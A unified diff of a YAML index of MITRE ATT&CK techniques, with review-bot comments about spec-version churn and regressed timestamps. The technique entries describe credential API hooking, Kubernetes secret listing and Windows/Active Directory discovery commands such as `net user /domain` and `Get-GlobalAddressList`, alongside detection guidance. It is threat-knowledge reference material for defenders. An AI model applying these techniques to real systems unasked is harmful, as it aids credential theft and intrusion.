- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
- December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
- description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
- description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
- 12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
- description: Stack Exchange - Security. (2012, July 31). What are the methods
- to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-27T21:03:56.385Z'
name: 'Input Capture: Credential API Hooking'
description: |
Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
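Review bot: `spec_version: '2.1'` is stripped from the T1556 tail here and from every other technique object in this diff, while `x_mitre_attack_spec_version` is variously moved, bumped to 3.2.0 or (for T1556.004 and T1016.001 further down) removed outright. STIX 2.1 makes `spec_version` mandatory on every SDO, so if any consumer validates these technique blocks as STIX objects this breaks them; if the field was dropped deliberately because the generator now keeps it only at bundle level, state that in the commit message. The T1056.004 deletion in this hunk is the same key-reorder churn as T1003.006 above: the object is removed whole and re-added below, with `x_mitre_version: '1.0'` to `'1.1'`, the removal of `x_mitre_permissions_required` (Administrator, SYSTEM) and the new `revoked`/`x_mitre_deprecated` flags as the only real changes.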
@@ -48494,28 +49148,94 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ created: '2020-02-11T19:01:15.930Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
+ - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+ description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+ Retrieved December 18, 2017.
+ url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+ - source_name: Microsoft Hook Overview
+ description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+ December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
+ description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
+ description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+ 12, 2017.
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
+ description: Stack Exchange - Security. (2012, July 31). What are the methods
+ to find hooked functions and APIs?. Retrieved December 12, 2017.
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1056.004
atomic_tests: []
T1552.007:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:25:28.820Z'
name: Kubernetes List Secrets
description: "Adversaries may gather credentials via APIs within a containers
environment. APIs in these environments, such as the Docker API and Kubernetes
@@ -48572,9 +49292,8 @@ credential-access:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.007
atomic_tests: []
T1556.004:
@@ -48605,7 +49324,7 @@ credential-access:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
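Review bot: `modified` for T1556.004 moves backwards in this hunk, from `'2022-05-11T14:00:00.188Z'` to `'2021-12-14T23:14:26.107Z'`, and the same regression happens below for T1613, T1016.001, T1615, T1652, T1069.002, T1007 and T1120 (each from a `T14:00:00.188Z` release-style stamp to an earlier per-object time). A refresh from a newer upstream bundle should not make objects older; either the source bundle mixes snapshots or upstream rewrote those stamps. Say which in the commit message, and check that nothing in the repo uses `modified` as a freshness or ordering signal.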
@@ -48629,8 +49348,6 @@ credential-access:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
discovery:
T1033:
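Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` from T1556.004 together with `spec_version` and adds nothing back, so after the change the object carries no attack spec version at all; T1016.001 gets the same treatment further down (`- x_mitre_attack_spec_version: 2.1.0` with no `+` counterpart), whereas T1003.006, T1056.004 and T1082 are bumped to 3.2.0 in the same diff. Together with the backwards `modified` dates this looks like objects regenerated from different upstream snapshots; verify the source bundle version and, if the field is genuinely absent upstream for these two, note it so the missing field is not later mistaken for a generator bug.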
@@ -48695,12 +49412,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1033
atomic_tests: []
T1613:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:08:50.706Z'
name: Container and Resource Discovery
description: "Adversaries may attempt to discover containers and other resources
that are available within a containers environment. Other resources may include
@@ -48759,7 +49475,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1613
atomic_tests: []
T1016.001:
@@ -48780,7 +49495,7 @@ discovery:
- source_name: mitre-attack
external_id: T1016.001
url: https://attack.mitre.org/techniques/T1016/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-25T17:03:26.632Z'
name: 'System Network Configuration Discovery: Internet Connection Discovery'
description: |-
Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert
, and GET requests to websites.
@@ -48801,13 +49516,11 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1016.001
atomic_tests: []
T1069:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:03:06.294Z'
name: Permission Groups Discovery
description: |-
Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -48830,15 +49543,14 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Group: Group Metadata'
@@ -48864,13 +49576,12 @@ discovery:
url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1069.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:51:35.759Z'
name: Cloud Groups
description: |-
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -48895,12 +49606,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -48942,13 +49652,12 @@ discovery:
url: https://github.com/True-Demon/raindance
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1615:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-01-06T12:41:08.579Z'
name: Group Policy Discovery
description: |-
Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\SYSVOL\\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -49009,12 +49718,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1615
atomic_tests: []
T1652:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:07:16.804Z'
name: Device Driver Discovery
description: |-
Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -49078,19 +49786,18 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1652
atomic_tests: []
T1087.002:
technique:
- modified: '2024-04-15T21:33:57.732Z'
+ modified: '2024-05-31T04:00:37.651Z'
name: 'Account Discovery: Domain Account'
description: "Adversaries may attempt to get a listing of domain accounts. This
information can help adversaries determine which domain accounts exist to
aid in follow-on behavior such as targeting specific accounts which possess
particular privileges.\n\nCommands such as net user /domain
and
net group /domain
of the [Net](https://attack.mitre.org/software/S0039)
- utility, dscacheutil -q group
on macOS, and ldapsearch
+ utility, dscacheutil -q group
on macOS, and ldapsearch
on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
cmdlets including Get-ADUser
and Get-ADGroupMember
may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
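Review bot: the two description lines replaced in the T1087.002 hunk are identical as rendered (`utility, dscacheutil -q group` and `on macOS, and ldapsearch` both before and after), so the actual change is in something not visible here: trailing whitespace, a non-breaking space, or markup that this view strips. Confirm what changed and that it is intended; invisible-character churn inside a quoted YAML scalar is easy to reintroduce on the next regeneration and makes the accompanying `modified` bump ('2024-04-15' to '2024-05-31') read as a content edit when the visible text did not change.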
@@ -49137,7 +49844,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.002
atomic_tests: []
T1087.001:
@@ -49204,12 +49910,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.001
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -49299,18 +50004,17 @@ discovery:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests: []
T1069.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:16:47.754Z'
name: 'Permission Groups Discovery: Domain Groups'
description: |-
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
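Review bot: the `Deloitte Environment Awareness` reference now points at `https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit` (a `/edit` suffix appended, retrieved date moved to September 13, 2024). A Google Drive link is an access-controlled citation target that cannot be reliably archived, and the `/edit` form requests editing access rather than the read-only `/view`; if the index must mirror upstream verbatim leave it as is, otherwise prefer the plain file URL or an archived copy. The T1069.002 `modified` date at the end of this hunk regresses in the same way noted above for T1556.004.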
@@ -49353,12 +50057,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.002
atomic_tests: []
T1007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:55:18.326Z'
name: System Service Discovery
description: |-
Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query
, tasklist /svc
, systemctl --type=service
, and net start
.
@@ -49399,12 +50102,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1007
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -49489,7 +50191,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests: []
T1135:
@@ -49551,12 +50252,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1135
atomic_tests: []
T1120:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:41.575Z'
name: Peripheral Device Discovery
description: 'Adversaries may attempt to gather information about attached peripheral
devices and components connected to a computer system.(Citation: Peripheral
@@ -49607,12 +50307,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1120
atomic_tests: []
T1082:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:42:22.247Z'
name: System Information Discovery
description: |-
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -49623,7 +50322,6 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Maril Vernon @shewhohacks
- Praetorian
@@ -49638,7 +50336,6 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- IaaS
@@ -49686,7 +50383,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1082
atomic_tests: []
T1016.002:
@@ -49758,12 +50456,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:22:56.372Z'
name: Application Window Discovery
description: |-
Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -49805,122 +50502,73 @@ discovery:
- source_name: Prevailion DarkWatchman 2021
description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
new evolution in fileless techniques. Retrieved January 10, 2022.'
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1010
atomic_tests: []
T1087.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
- type: attack-pattern
- created: '2020-02-21T21:08:33.237Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.003
- url: https://attack.mitre.org/techniques/T1087/003
- - source_name: Microsoft Exchange Address Lists
- url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
- description: Microsoft. (2020, February 7). Address lists in Exchange Server.
- Retrieved March 26, 2020.
- - source_name: Microsoft getglobaladdresslist
- url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
- description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
- 2019.
- - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
- Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
- source_name: Black Hills Attacking Exchange MailSniper, 2016
- - source_name: Google Workspace Global Access List
- url: https://support.google.com/a/answer/166870?hl=en
- description: Google. (n.d.). Retrieved March 16, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-17T20:35:35.125Z'
name: Email Account
description: |-
Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
- In on-premises Exchange and Exchange Online, theGet-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+ In on-premises Exchange and Exchange Online, the Get-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_deprecated: false
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1497.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
+ id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+ created: '2020-02-21T21:08:33.237Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
